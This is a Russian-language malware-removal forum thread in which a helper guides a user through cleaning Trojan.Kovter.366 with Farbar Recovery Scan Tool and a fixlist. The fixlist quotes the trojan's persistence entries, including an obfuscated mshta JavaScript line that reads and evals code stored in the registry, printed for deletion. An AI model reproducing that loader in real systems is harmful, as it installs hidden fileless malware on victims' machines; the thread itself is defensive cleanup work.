Решена Помогите удалить Trojan.Kovter.366

Статус
В этой теме нельзя размещать новые ответы.

tupolev140

Новый пользователь
Сообщения
5
Реакции
0
Добрый день!
В автозагрузке появился ярлык cmd, который выполняет:
C:\WINDOWS\system32\cmd.exe /C start "" "C:\Documents and Settings\user\Application Data\ac5dc\9bb43.3d5eb5"
Удалить нельзя, появляется снова.

Проверил утилитой cureit, она нашла 1 угрозу Trojan.Kovter.366 после лечения появляется снова.
Логи во вложении.
Спасибо!
 

Вложения

  • CollectionLog-2016.12.08-20.00.zip
    74.3 KB · Просмотры: 1
вроде удалилось утилитой от касперского KVRT.exe он нашел 6 угроз, удалил их
 
Скачайте Farbar Recovery Scan Tool
NAAC5Ba.png
и сохраните на Рабочем столе.
  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.
3munStB.png

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
 
готово
 

Вложения

  • FRST.zip
    21.6 KB · Просмотры: 2
1. Откройте Блокнот и скопируйте в него приведенный ниже текст
Код:
CreateRestorePoint:
GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicy\User: Restriction - Chrome <======= ATTENTION
Toolbar: HKU\S-1-5-21-1417001333-1592454029-839522115-1003 -> No Name - {0E1230F8-EA50-42A9-983C-D22ABC2EED3C} -  No File
FF DefaultSearchEngine: C:\Documents and Settings\user\Application Data\Profiles\209pa7zg.default -> trotux
CHR Extension: (PageLiner) - C:\Documents and Settings\user\Local Settings\Application Data\Google\Chrome\User Data\todipycoudusanifertion\Extensions\nepakmljodobhlbbkpobblnifmhclemh [2016-12-06]
2016-12-08 00:51 - 2016-12-08 00:51 - 00000000 ____D C:\Documents and Settings\user\Application Data\Enigma Software Group
2016-12-08 00:49 - 2016-12-08 00:49 - 00019984 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2016-06-30 21:58 - 2016-06-30 21:58 - 0011568 _____ () C:\Documents and Settings\user\Application Data\InstallationConfiguration.xml
HKU\S-1-5-21-1417001333-1592454029-839522115-1003\Software\Classes\d96a5: "C:\WINDOWS\system32\mshta.exe" "javascript:QzkZIjZ01="9H9ig2";h2S=new ActiveXObject("WScript.Shell");VwU1eW="O0MM";Kk9h7B=h2S.RegRead("HKCU\\software\\ohagr\\bmst");T2Joc="Ou";eval(Kk9h7B);kxSP2="hq";" <===== ATTENTION
Reboot:
2. Нажмите ФайлСохранить как
3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
4. Укажите Тип файлаВсе файлы (*.*)
5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание, что будет выполнена перезагрузка компьютера.
 
сделал
 

Вложения

  • Fixlog.txt
    2.7 KB · Просмотры: 1
  • Загрузите SecurityCheck by glax24 и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10)
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу.
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Скопируйте содержимое файла в свое следующее сообщение.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу